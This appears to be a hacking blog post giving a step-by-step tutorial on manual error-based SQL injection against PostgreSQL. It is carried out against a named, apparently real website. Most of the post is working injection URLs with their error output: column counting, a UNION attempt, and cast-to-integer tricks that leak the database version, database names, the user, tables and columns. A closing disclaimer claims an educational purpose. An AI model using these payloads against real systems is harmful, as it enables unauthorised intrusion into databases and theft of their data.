Manual sql injection tutorial: Postgre Error based !!!
































                   















Postgre:





































Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.

Lets start to play with Postgre:
we have a sql error based vulnerable website:
1st Step find the vulnerability:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"
its mean this website can be injected.remember errors can varies you wont get the same error every time.
2nd Step Columns count:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.
Lets try UNION SELECT query:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!


Lets try Errorbased Postgre SQLi…

3rd Step:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--


ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.
Lets move on and find database name.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset :)
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.
Lets find out the user:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--


Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)
Lets find the tables :>
4th step:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--


Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset :)
5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use oracle char conversion.
Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..
Last step:
Now we have to extract data from our column .

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"


Responses

0 Respones to "Manual sql injection tutorial: Postgre Error based !!!"

Post a Comment

Instructions

THIS WEBSITE IS BUILT BY ME FOR EDUCATIONAL PURPOSE. IF YOU USE THIS INFORMATION TO HARM ANY SUBSTANCE OR COMMUNITY PERSONALLY AND GOT CAUGHT THAN WE ARE NOT RESPONSIBLE, EXPAND YOUR INFORMATION,SHARE UR THOUGHTS AND KNOWLEDGE WITH US. MAIL ME ON RRRICKY.SAINI2@GMAIL.COM

Contributors

Stay Connected

DMCA.com
Return to top of page Copyright © 2011 | Platinum Theme Converted into Blogger Template by devzcyberarena